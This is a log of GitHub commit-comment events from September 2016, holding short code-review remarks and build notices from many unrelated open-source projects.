{"id":"4504856443","type":"CommitCommentEvent","actor":{"login":"afgane"},"repo":{"name":"gvlproject/cloudbridge"},"payload":{"comment":{"id":18869958,"position":25,"line":57,"path":"cloudbridge/__init__.py","commit_id":"70a86b03a4857b7957d3ce6438425231f0bf5668","created_at":"2016-09-01T20:15:41Z","updated_at":"2016-09-01T20:15:41Z","body":"I know it's not needed (hence a dedicated commit), but despite [the general confidence in the standard logging levels](https://docs.python.org/3/howto/logging.html#custom-levels), I have *always* felt there should be a level below debug... Given this is a reusable library, it's probably less desirable to have a custom logging than in an application so I'm ok if we just scrape it. "}},"created_at":"2016-09-01T20:15:41Z"}
{"id":"4504860111","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18869968,"position":9,"line":132,"path":"src/web/js/repl-ui.js","commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T20:16:22Z","updated_at":"2016-09-01T20:16:22Z","body":"Above, `error_to_reason` is annotated with \"must be called on pyret stack\", but here it appears immediately after pausing, so it is definitely _not_ on a Pyret stack."}},"created_at":"2016-09-01T20:16:22Z"}
{"id":"4504860182","type":"CommitCommentEvent","actor":{"login":"kevinchesser"},"repo":{"name":"adf37/OperatingSystems"},"payload":{"comment":{"id":18869969,"position":null,"line":null,"path":null,"commit_id":"182518ea24c479582e444c72f3e8f382284b6183","created_at":"2016-09-01T20:16:23Z","updated_at":"2016-09-01T20:16:23Z","body":"When are we gonna get some sick updates??? "}},"created_at":"2016-09-01T20:16:23Z"}
{"id":"4504861633","type":"CommitCommentEvent","actor":{"login":"MasterDuke17"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":18869972,"position":60,"line":60,"path":"docs/release_guide_automated.md","commit_id":"816020ffbdc5c282fb1767d4bbc40664ac7c182c","created_at":"2016-09-01T20:16:39Z","updated_at":"2016-09-01T20:16:39Z","body":"I'm not sure if there's a typo, grammaro, or it's just an odd construction, but these first two sentences are hard to parse/understand."}},"created_at":"2016-09-01T20:16:39Z"}
{"id":"4504861878","type":"CommitCommentEvent","actor":{"login":"rianby64"},"repo":{"name":"IldarMin/PalindromeExample"},"payload":{"comment":{"id":18869973,"position":11,"line":11,"path":"index.html","commit_id":"544d4e389f19b05ae2d346370be2857126503611","created_at":"2016-09-01T20:16:42Z","updated_at":"2016-09-01T20:16:42Z","body":"    function isPalindrome(text) {\r\n      return reverse(text) === text;\r\n    }\r\n\r\nне мое решение, но тем не менее - красиво сделано"}},"created_at":"2016-09-01T20:16:42Z"}
{"id":"4504862533","type":"CommitCommentEvent","actor":{"login":"rianby64"},"repo":{"name":"IldarMin/PalindromeExample"},"payload":{"comment":{"id":18869976,"position":null,"line":null,"path":null,"commit_id":"544d4e389f19b05ae2d346370be2857126503611","created_at":"2016-09-01T20:16:51Z","updated_at":"2016-09-01T20:16:51Z","body":"https://puu.sh/qWBrF/8cde3da9cf.png --- почему не известно"}},"created_at":"2016-09-01T20:16:51Z"}
{"id":"4504864983","type":"CommitCommentEvent","actor":{"login":"rkorobeynikov"},"repo":{"name":"AnnaShant/217602-sedona"},"payload":{"comment":{"id":18869983,"position":9,"line":9,"path":"css/style_sedona.css","commit_id":"3d0f1c37f21280fe1101ecba84b400315be46887","created_at":"2016-09-01T20:17:18Z","updated_at":"2016-09-01T20:17:18Z","body":"Почему 1230? Должно быть 1200, тогда не будет отступов по бокам и будет правильно."}},"created_at":"2016-09-01T20:17:18Z"}
{"id":"4504865110","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18869984,"position":12,"line":45,"path":"src/scoredefinterface.cpp","commit_id":"5bb9115cd2dc76f46f46f5b58835c9043ea3f930","created_at":"2016-09-01T20:17:19Z","updated_at":"2016-09-01T20:17:19Z","body":"Attribute classes need to be \"registered\" (this is a replacement of dynamic casts that are too slow with the extended multiple inheritance structure we have with MEI)"}},"created_at":"2016-09-01T20:17:19Z"}
{"id":"4504866069","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18869986,"position":null,"line":null,"path":null,"commit_id":"f7ae21a22bb4642b8c4c638d6d64042b74336e2c","created_at":"2016-09-01T20:17:31Z","updated_at":"2016-09-01T20:17:31Z","body":"The following doc(s) have been deployed to the [peterpanth](https://peterpanth-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/php-versions](https://peterpanth-static-docs.pantheonsite.io/docs/php-versions)\n"}},"created_at":"2016-09-01T20:17:31Z"}
{"id":"4504866600","type":"CommitCommentEvent","actor":{"login":"jundis"},"repo":{"name":"Shayughul/CWSlack-SlashCommands"},"payload":{"comment":{"id":18869988,"position":null,"line":null,"path":null,"commit_id":"c373ab8a1f02ca529817aa74f0f46238d913e67f","created_at":"2016-09-01T20:17:37Z","updated_at":"2016-09-01T20:17:37Z","body":"That would be correct. Woops!"}},"created_at":"2016-09-01T20:17:37Z"}
{"id":"4504867319","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18869990,"position":20,"line":64,"path":"src/scoredefinterface.cpp","commit_id":"5bb9115cd2dc76f46f46f5b58835c9043ea3f930","created_at":"2016-09-01T20:17:46Z","updated_at":"2016-09-01T20:17:46Z","body":"Attribute classes also need to be \"reset\""}},"created_at":"2016-09-01T20:17:46Z"}
{"id":"4504868415","type":"CommitCommentEvent","actor":{"login":"LinguList"},"repo":{"name":"glottobank/lexibank-data"},"payload":{"comment":{"id":18869996,"position":34,"line":117,"path":"datasets/leeainu/__init__.py","commit_id":"4d01ecfd47424d428a99c7427d97e025f939cfbb","created_at":"2016-09-01T20:17:59Z","updated_at":"2016-09-01T20:17:59Z","body":"clean_string used dashes as \"splitters\". As a result, since there are many bad dashes in the Ainu data, the words will give an empty string. So I changed to \"?\", since this does not occur..."}},"created_at":"2016-09-01T20:17:59Z"}
{"id":"4504871551","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18870003,"position":null,"line":null,"path":null,"commit_id":"5bb9115cd2dc76f46f46f5b58835c9043ea3f930","created_at":"2016-09-01T20:18:35Z","updated_at":"2016-09-01T20:18:35Z","body":"I will push the corresponding changes in the Verovio LibMEI where the default are now defined."}},"created_at":"2016-09-01T20:18:35Z"}
{"id":"4504874423","type":"CommitCommentEvent","actor":{"login":"rianby64"},"repo":{"name":"IldarMin/PalindromeExample"},"payload":{"comment":{"id":18870007,"position":22,"line":22,"path":"index.html","commit_id":"544d4e389f19b05ae2d346370be2857126503611","created_at":"2016-09-01T20:19:11Z","updated_at":"2016-09-01T20:19:11Z","body":"сложно написано ))) следующий раз смотри на решение как смотрит ... художник )) он набросал несколько штрихов и отходит несколько шагов назад чтобы увидеть картину целиком. А так, если работает то и тоже хорошо."}},"created_at":"2016-09-01T20:19:11Z"}
{"id":"4504876852","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"mljs/ml"},"payload":{"comment":{"id":18870011,"position":8,"line":14,"path":"README.md","commit_id":"2a6d349ed1cca45076faee26d049a40b47e1fd23","created_at":"2016-09-01T20:19:36Z","updated_at":"2016-09-01T20:19:36Z","body":"The spaces were here for a reason: In markdown, you must put two consecutive spaces at the end of a line to render a new line."}},"created_at":"2016-09-01T20:19:36Z"}
{"id":"4504877348","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18870014,"position":null,"line":null,"path":null,"commit_id":"15602ffa8f4c4764589aa7c3cdc36cd19486ed78","created_at":"2016-09-01T20:19:41Z","updated_at":"2016-09-01T20:19:41Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.241.15602ffa8f4c4764589aa7c3cdc36cd19486ed78](http://build.palaso.org/viewLog.html?buildId=76375&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **UNKNOWN**\nSummary: Canceled (Tests passed: 628, ignored: 6; exit code 1 (new)) Build time: 00:01:20"}},"created_at":"2016-09-01T20:19:41Z"}
{"id":"4504878419","type":"CommitCommentEvent","actor":{"login":"universam1"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18870018,"position":null,"line":null,"path":null,"commit_id":"c4d966bdc04755eb56506813d61dae8ed7e05730","created_at":"2016-09-01T20:19:53Z","updated_at":"2016-09-01T20:19:53Z","body":"@mikeller I just found that you must have an old version of SoftSerial! In meantime they implemented dynamic calculation for baud rates. My library with Arduino 1.6.11 does work nicely!\r\nhttps://github.com/arduino/Arduino/issues/1198"}},"created_at":"2016-09-01T20:19:53Z"}
{"id":"4504880233","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18870022,"position":6,"line":89,"path":"app/controllers/kaui/admin_tenants_controller.rb","commit_id":"a00ab91b138911800b80b857508c20337f6758cb","created_at":"2016-09-01T20:20:15Z","updated_at":"2016-09-01T20:20:15Z","body":"yep better. Will fix ( i knew that syntax existed, just forgot about the details)\r\n"}},"created_at":"2016-09-01T20:20:15Z"}
{"id":"4504880445","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Birajhow/EDL"},"payload":{"comment":{"id":18870024,"position":null,"line":null,"path":null,"commit_id":"92bc6da6ca770e2ec73517ce46695cde74dbb115","created_at":"2016-09-01T20:20:17Z","updated_at":"2016-09-01T20:20:17Z","body":"Essa era a tarefa 00. Estou perguntando da tarefa 01. Exemplo:\r\nhttps://github.com/AnnyCaroline/EDL/blob/master/trabalhos/trabalho-01/ARTIGO.md"}},"created_at":"2016-09-01T20:20:17Z"}
{"id":"4504882778","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18870030,"position":12,"line":12,"path":"app/views/kaui/admin_tenants/_show_overdue.erb","commit_id":"a00ab91b138911800b80b857508c20337f6758cb","created_at":"2016-09-01T20:20:42Z","updated_at":"2016-09-01T20:20:42Z","body":"Seems like it..."}},"created_at":"2016-09-01T20:20:42Z"}
{"id":"4504883470","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18870031,"position":null,"line":null,"path":null,"commit_id":"5bb9115cd2dc76f46f46f5b58835c9043ea3f930","created_at":"2016-09-01T20:20:50Z","updated_at":"2016-09-01T20:20:50Z","body":"Here it is https://github.com/rism-ch/libmei/commit/876accfce1306c2411341b0320fec992f1815144"}},"created_at":"2016-09-01T20:20:50Z"}
{"id":"4504885428","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18870036,"position":76,"line":496,"path":"src/web/js/check-ui.js","commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T20:21:13Z","updated_at":"2016-09-01T20:21:13Z","body":"If a failed promise reaches `done`, an exception is thrown on a future turn, so it gets logged to the console, and the caller in these libraries doesn't get notified.\r\n\r\nSee https://github.com/kriskowal/q/wiki/API-Reference#promisedoneonfulfilled-onrejected-onprogress\r\n\r\nIs that an accurate summary, @jswrenn?  Seems like this would lead to situations with empty skeletons on failure – is that a correct mental model for me to have?"}},"created_at":"2016-09-01T20:21:13Z"}
{"id":"4504894616","type":"CommitCommentEvent","actor":{"login":"devinttest"},"repo":{"name":"devinttest/public-repo"},"payload":{"comment":{"id":18870054,"position":null,"line":null,"path":null,"commit_id":"39efce0f46483d94a1a949e91f9dc621f3bd0ea8","created_at":"2016-09-01T20:23:05Z","updated_at":"2016-09-01T20:23:05Z","body":"commenting on a file in branch patch-2016-0901"}},"created_at":"2016-09-01T20:23:05Z"}
{"id":"4504896262","type":"CommitCommentEvent","actor":{"login":"cdsmith"},"repo":{"name":"stefan-j/codeworld"},"payload":{"comment":{"id":18870059,"position":9,"line":173,"path":"funblocks-client/src/Blocks/Parser.hs","commit_id":"8b2bc93aed15ef99a4802f5b2afd38b9511e485e","created_at":"2016-09-01T20:23:24Z","updated_at":"2016-09-01T20:23:24Z","body":"Don't you want this instead?\r\n\r\n    escape' = show\r\n\r\nThis would be much more future-proof: it would correctly handle control characters, newlines, weird unicode cases, etc."}},"created_at":"2016-09-01T20:23:24Z"}
{"id":"4504896685","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18870061,"position":null,"line":null,"path":null,"commit_id":"15602ffa8f4c4764589aa7c3cdc36cd19486ed78","created_at":"2016-09-01T20:23:30Z","updated_at":"2016-09-01T20:23:30Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.242.15602ffa8f4c4764589aa7c3cdc36cd19486ed78](http://build.palaso.org/viewLog.html?buildId=76376&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1284, ignored: 17 Build time: 00:03:33"}},"created_at":"2016-09-01T20:23:30Z"}
{"id":"4504897521","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18870063,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T20:23:40Z","updated_at":"2016-09-01T20:23:40Z","body":"I'm sorry for whatever is going on with your health. Please do take care of it first and don't worry about this issue. It can wait. I have a workaround. @f1u77y is probably working on a fix and I am in no position to merge or not merge it. Everything will be fine.\r\n\r\nThis whole me being someone who Knows Better and insists and whatever is a misunderstanding. I said that having to deal with ManageDocks implementation details in layout reset in user configs is a very bad idea and I stand behind that claim. I never said I wouldn't accept valid arguments for the startup hook issue. I do think it's not necessary, I still don't understand why something that happens exactly once during xmonad runtime can't happen in manageHook or runLayout, but I did start the IRC discussion in order to understand it and come to a mutual agreement. (But yeah, it's certainly possible I'm just too stupid and won't ever be able to understand it. If that's the case, sorry for wasting your time.)"}},"created_at":"2016-09-01T20:23:40Z"}
{"id":"4504898342","type":"CommitCommentEvent","actor":{"login":"igarciar"},"repo":{"name":"igarciar/testProyect"},"payload":{"comment":{"id":18870066,"position":null,"line":null,"path":null,"commit_id":"7b9f8de19cd3b293e6221dad4c7f9c934fa53c07","created_at":"2016-09-01T20:23:50Z","updated_at":"2016-09-01T20:23:50Z","body":"no"}},"created_at":"2016-09-01T20:23:50Z"}
{"id":"4504900034","type":"CommitCommentEvent","actor":{"login":"apopiak"},"repo":{"name":"mrzzzrm/CloudGL"},"payload":{"comment":{"id":18870071,"position":23,"line":268,"path":"source/broker/BrokerClientSession.cpp","commit_id":"4f9672a5282abfb7b5abb177c0ca894ded29daa9","created_at":"2016-09-01T20:24:12Z","updated_at":"2016-09-01T20:24:12Z","body":"When writing into the cache above you still pass in `.data()` which means that anything in there is overwritten, right?"}},"created_at":"2016-09-01T20:24:12Z"}
{"id":"4504900779","type":"CommitCommentEvent","actor":{"login":"paulej"},"repo":{"name":"ietf/perc-wg"},"payload":{"comment":{"id":18870072,"position":232,"line":327,"path":"draft-jones-perc-dtls-tunnel/draft-jones-perc-dtls-tunnel.md","commit_id":"6cabcd52999a9743afc5a5b2264eeaba239589a4","created_at":"2016-09-01T20:24:21Z","updated_at":"2016-09-01T20:24:21Z","body":"> Could we require that it never reuse one if either of those conditions are not met?\r\n\r\nThe MD definitely should not. That would go against the purpose for having the association identifier in the first place.  It should only re-use a value once the association is gone.  The corner case is when the MD thinks it's gone, but the KD doesn't.  Perhaps a simple solution is this: always require the MD to send an \"endpoint disconnect\" message.  That way, there is no ambiguity.  Then the time between re-use is really insignificant, assuming the message did arrive.  While TCP is \"reliable\", we know there is the possibility the connection drops and messages in the queues get flushed.  But, that's an extreme corner case far removed from all likelihood (i.e., client failed, media disconnect message failed, client called back, same association ID is assigned (odds are 1 in 2^32), etc.).\r\n\r\nAs I said, it's a corner case, but I nonetheless like the idea of the MDD clearly indicating the end of an association.\r\n"}},"created_at":"2016-09-01T20:24:21Z"}
{"id":"4504901452","type":"CommitCommentEvent","actor":{"login":"cdjackson"},"repo":{"name":"eclipse/smarthome"},"payload":{"comment":{"id":18870075,"position":16,"line":78,"path":"extensions/persistence/org.eclipse.smarthome.persistence.h2/src/main/java/org/eclipse/smarthome/persistence/h2/internal/H2PersistenceService.java","commit_id":"595c311db36e6e16502d4f548bd6c199a3528435","created_at":"2016-09-01T20:24:29Z","updated_at":"2016-09-01T20:24:29Z","body":"Not really. The only suggestion would be to store everything as a string. However I ran some benchmarks on this, and it was expensive in time and storage."}},"created_at":"2016-09-01T20:24:29Z"}
{"id":"4504907598","type":"CommitCommentEvent","actor":{"login":"adam17"},"repo":{"name":"adam17/ustawieniaMac"},"payload":{"comment":{"id":18870084,"position":4,"line":6,"path":".profile","commit_id":"d2e430e597f1b516b1faf909154bb7698bbc6a0e","created_at":"2016-09-01T20:25:38Z","updated_at":"2016-09-01T20:25:38Z","body":"Leaving a comment ;-}"}},"created_at":"2016-09-01T20:25:38Z"}
{"id":"4504909329","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18870090,"position":2,"line":2,"path":"site/leigh.html","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T20:25:59Z","updated_at":"2016-09-01T20:25:59Z","body":"Add the `lang=\"en\"` attribute to specify the document's language (just noticed this when reviewing the page in Google Webmaster Tools."}},"created_at":"2016-09-01T20:25:59Z"}
{"id":"4504910788","type":"CommitCommentEvent","actor":{"login":"monicabazurdo"},"repo":{"name":"zetasergio/RutasEcoturisticasColombia"},"payload":{"comment":{"id":18870094,"position":null,"line":null,"path":null,"commit_id":"82092ba96f7f28784585c757a9c5d7c4e2a3f683","created_at":"2016-09-01T20:26:17Z","updated_at":"2016-09-01T20:26:17Z","body":"[Avance proyecto.docx](https://github.com/zetasergio/RutasEcoturisticasColombia/files/450628/Avance.proyecto.docx)\r\n"}},"created_at":"2016-09-01T20:26:17Z"}
{"id":"4504913844","type":"CommitCommentEvent","actor":{"login":"mbabker"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":18870106,"position":null,"line":null,"path":null,"commit_id":"3bce61948605f440ae2d0d3450e3135a1df2280a","created_at":"2016-09-01T20:26:49Z","updated_at":"2016-09-01T20:26:49Z","body":"You should know by now the subject of this commit is impossible."}},"created_at":"2016-09-01T20:26:49Z"}
{"id":"4504915776","type":"CommitCommentEvent","actor":{"login":"johnkors"},"repo":{"name":"IdentityServer/IdentityServer3"},"payload":{"comment":{"id":18870111,"position":5,"line":163,"path":"source/Core/Resources/Events.resx","commit_id":"eddbb3c7d6f175b35c8f0795bf77e20d985afd98","created_at":"2016-09-01T20:27:11Z","updated_at":"2016-09-01T20:27:11Z","body":"https://github.com/johnkors/IdentityServer3.Contrib.Localization/issues/55"}},"created_at":"2016-09-01T20:27:11Z"}
{"id":"4504922743","type":"CommitCommentEvent","actor":{"login":"GianniCarlo"},"repo":{"name":"CocoaPods/Specs"},"payload":{"comment":{"id":18870124,"position":null,"line":null,"path":null,"commit_id":"cd74fea7c0c4ed34c50839ede218ecbf460010b0","created_at":"2016-09-01T20:28:30Z","updated_at":"2016-09-01T20:28:30Z","body":"Wops sorry @jessesquires  I'm on it"}},"created_at":"2016-09-01T20:28:30Z"}
{"id":"4504925454","type":"CommitCommentEvent","actor":{"login":"messani"},"repo":{"name":"bsekisser/simavr"},"payload":{"comment":{"id":18870136,"position":48,"line":307,"path":"simavr/sim/avr_timer.c","commit_id":"a7f0de0f759be78ff4cf345e1e35c9694c454970","created_at":"2016-09-01T20:29:02Z","updated_at":"2016-09-01T20:29:02Z","body":"I wanted to check this.\r\nDoc says:\r\nThe 8-bit comparator continuously compares TCNT0 with the Output Compare Registers (OCR0A and\r\nOCR0B). Whenever TCNT0 equals OCR0A or OCR0B, the comparator signals a match. A match will set the\r\nOutput Compare Flag (OCF0A or OCF0B) at the next **timer** clock cycle. \r\n\r\nI overlooked word **timer** so you were right. I have to apologize."}},"created_at":"2016-09-01T20:29:02Z"}
{"id":"4504927296","type":"CommitCommentEvent","actor":{"login":"mikeller"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18870142,"position":null,"line":null,"path":null,"commit_id":"c4d966bdc04755eb56506813d61dae8ed7e05730","created_at":"2016-09-01T20:29:23Z","updated_at":"2016-09-01T20:29:23Z","body":"Ha, that's good news. Changing it to support 8E2 will be comparatively easy.\r\n\r\nI still think there is value in doing an implementation that can be used by any controller that supports MULTI."}},"created_at":"2016-09-01T20:29:23Z"}
{"id":"4504933183","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18870161,"position":3,"line":3,"path":"site/leigh.html","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T20:30:29Z","updated_at":"2016-09-01T20:30:29Z","body":"Don't forget the `viewport` meta-tag for iOS and Android devices."}},"created_at":"2016-09-01T20:30:29Z"}
{"id":"4504938598","type":"CommitCommentEvent","actor":{"login":"sunnykhakse"},"repo":{"name":"sunnykhakse/sktest"},"payload":{"comment":{"id":18870178,"position":6,"line":7,"path":"index.php","commit_id":"d9b32e4f5337a60ad9c0479484e85ee148f0f111","created_at":"2016-09-01T20:31:28Z","updated_at":"2016-09-01T20:31:28Z","body":"this is test"}},"created_at":"2016-09-01T20:31:28Z"}
{"id":"4504939106","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18870179,"position":null,"line":null,"path":null,"commit_id":"a60258bc7fd6adb247fc899544edc006fe920cf7","created_at":"2016-09-01T20:31:33Z","updated_at":"2016-09-01T20:31:33Z","body":"Так есть же для этого дела https://github.com/jzaefferer/jquery-validation"}},"created_at":"2016-09-01T20:31:33Z"}
{"id":"4504939532","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18870180,"position":2,"line":2,"path":"site/style.css","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T20:31:38Z","updated_at":"2016-09-01T20:31:38Z","body":"Do we also need the standard non-ms-specific `@viewport` here? (I've not idea, I only just heard about `@viewport` and I don't know whether any other browsers support it yet)"}},"created_at":"2016-09-01T20:31:38Z"}
{"id":"4504940793","type":"CommitCommentEvent","actor":{"login":"Rondom"},"repo":{"name":"keybase/client"},"payload":{"comment":{"id":18870182,"position":19,"line":210,"path":"packaging/windows/WIXInstallers/KeybaseBundle/Bundle.wxs","commit_id":"a9c8bddc389f761dc68a234983540311d7e77758","created_at":"2016-09-01T20:31:51Z","updated_at":"2016-09-01T20:31:51Z","body":"It's Lyrina or Maxhy. I am planning to improve the scripts used for building anyways (to make them  produce and make available all the artifacts in CI as well). It will be the same script that's used for making releases as well, so I will keep your suggestion in mind."}},"created_at":"2016-09-01T20:31:51Z"}
{"id":"4504940878","type":"CommitCommentEvent","actor":{"login":"Myoldmopar"},"repo":{"name":"SEED-platform/seed"},"payload":{"comment":{"id":18870183,"position":null,"line":null,"path":null,"commit_id":"66918cf5a03760e04cf609d5f92f0cda8c526eda","created_at":"2016-09-01T20:31:52Z","updated_at":"2016-09-01T20:31:52Z","body":"@tallus Are any of these endpoints hooked up right now?  I don't see any references, and they have issues.  I was just trying to clean up some API endpoint paths for Swagger and I didn't know if I should spend my time decorating these or if they were just temporary.  ( @nllong )"}},"created_at":"2016-09-01T20:31:52Z"}
{"id":"4504946222","type":"CommitCommentEvent","actor":{"login":"brianteeman"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":18870193,"position":null,"line":null,"path":null,"commit_id":"3bce61948605f440ae2d0d3450e3135a1df2280a","created_at":"2016-09-01T20:32:46Z","updated_at":"2016-09-01T20:32:46Z","body":"I can but try"}},"created_at":"2016-09-01T20:32:46Z"}
{"id":"4504946245","type":"CommitCommentEvent","actor":{"login":"f1u77y"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18870194,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T20:32:46Z","updated_at":"2016-09-01T20:32:46Z","body":"Okay, if geekosaur can't answer I'll ask you, @liskin. Do you suggest rewriting `docksEventHook` **without messages**? If so, I don't realize how to handle newcoming docks well, in the other case I just don't understand what do you suggest."}},"created_at":"2016-09-01T20:32:46Z"}
{"id":"4504951839","type":"CommitCommentEvent","actor":{"login":"juliemr"},"repo":{"name":"angular/zone.js"},"payload":{"comment":{"id":18870205,"position":30,"line":87,"path":"lib/browser/browser.ts","commit_id":"6e2f13c594f7df89fa2915294de6f9af127f0266","created_at":"2016-09-01T20:33:49Z","updated_at":"2016-09-01T20:33:49Z","body":"Missing `)` here"}},"created_at":"2016-09-01T20:33:49Z"}
{"id":"4504952684","type":"CommitCommentEvent","actor":{"login":"Vindexus"},"repo":{"name":"monstercat/deon"},"payload":{"comment":{"id":18870210,"position":null,"line":null,"path":null,"commit_id":"4893569101c6d332e04dc6899d747965e102374a","created_at":"2016-09-01T20:34:01Z","updated_at":"2016-09-01T20:34:01Z","body":"Why does this happen I hate it."}},"created_at":"2016-09-01T20:34:01Z"}
{"id":"4504953352","type":"CommitCommentEvent","actor":{"login":"DigiTec"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18870212,"position":49,"line":191,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-01T20:34:09Z","updated_at":"2016-09-01T20:34:09Z","body":"acceleration has an extra m ;-)"}},"created_at":"2016-09-01T20:34:09Z"}
{"id":"4504954909","type":"CommitCommentEvent","actor":{"login":"random-person-001"},"repo":{"name":"random-person-001/MagicText"},"payload":{"comment":{"id":18870218,"position":6,"line":45,"path":"SourceryTextb1/GameObjects/TheSource/Wolf.java","commit_id":"36d2ae714f394e8cc2dbad25ff0ac19b3c2e6798","created_at":"2016-09-01T20:34:26Z","updated_at":"2016-09-01T20:34:26Z","body":"@HazilTheNut can you fix this whatever-it-is?  (Trying to make a FlavorText from a Mortal)"}},"created_at":"2016-09-01T20:34:26Z"}
{"id":"4504956700","type":"CommitCommentEvent","actor":{"login":"ivandrofly"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18870223,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-01T20:34:47Z","updated_at":"2016-09-01T20:34:47Z","body":"@marb99 \r\n\r\nHow did you produce the crash?"}},"created_at":"2016-09-01T20:34:47Z"}
{"id":"4504962210","type":"CommitCommentEvent","actor":{"login":"zfi"},"repo":{"name":"parallaxinc/Scribbler-3_Library"},"payload":{"comment":{"id":18870227,"position":null,"line":null,"path":null,"commit_id":"87058ecd70c8ce698265788372aef73f99333c51","created_at":"2016-09-01T20:35:49Z","updated_at":"2016-09-01T20:35:49Z","body":"Pushed library CloudCompiler-SpinLib-2016-09-01.133250 to Demo"}},"created_at":"2016-09-01T20:35:49Z"}
{"id":"4504963349","type":"CommitCommentEvent","actor":{"login":"lorwal"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18870229,"position":27,"line":30,"path":"R/cut.integer.R","commit_id":"4620a7ec43c9844753d92a34e7f9c5cda560ec5f","created_at":"2016-09-01T20:36:03Z","updated_at":"2016-09-01T20:36:03Z","body":"I never renamed function arguments so far because I think they should not be renamed. Of course, creating a copy of it (breakpoints) and modify it is also not extremely elegant, but at least it follows the convention of not changing function arguments within the function itself. Is there any common convention?"}},"created_at":"2016-09-01T20:36:03Z"}
{"id":"4504965215","type":"CommitCommentEvent","actor":{"login":"tgbugs"},"repo":{"name":"tgbugs/nlxeol"},"payload":{"comment":{"id":18870232,"position":null,"line":null,"path":null,"commit_id":"b3135d6cb73c8fb2cb6d77b4970765f827e46691","created_at":"2016-09-01T20:36:25Z","updated_at":"2016-09-01T20:36:25Z","body":"I will need to do this in the py file instead of manually for future."}},"created_at":"2016-09-01T20:36:25Z"}
{"id":"4504970299","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18870245,"position":194,"line":71,"path":"src/web/js/error-ui.js","commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T20:37:24Z","updated_at":"2016-09-01T20:37:24Z","body":"Again, `callDeferred` immediate calls `runThunk`, so I feel like this should say \"must _not_ be called on a Pyret stack\".  Getting the feeling that the comments may just be reversed."}},"created_at":"2016-09-01T20:37:24Z"}
{"id":"4504971928","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"rawsonj/triviabot"},"payload":{"comment":{"id":18870252,"position":null,"line":null,"path":null,"commit_id":"5cb5a216a478fd0ea04459523d329c1c9b92cddf","created_at":"2016-09-01T20:37:43Z","updated_at":"2016-09-01T20:37:43Z","body":"I removed several duplicates, fixed about 30 broken questions, corrected the case on many words, and fixed the answers on a few questions."}},"created_at":"2016-09-01T20:37:43Z"}
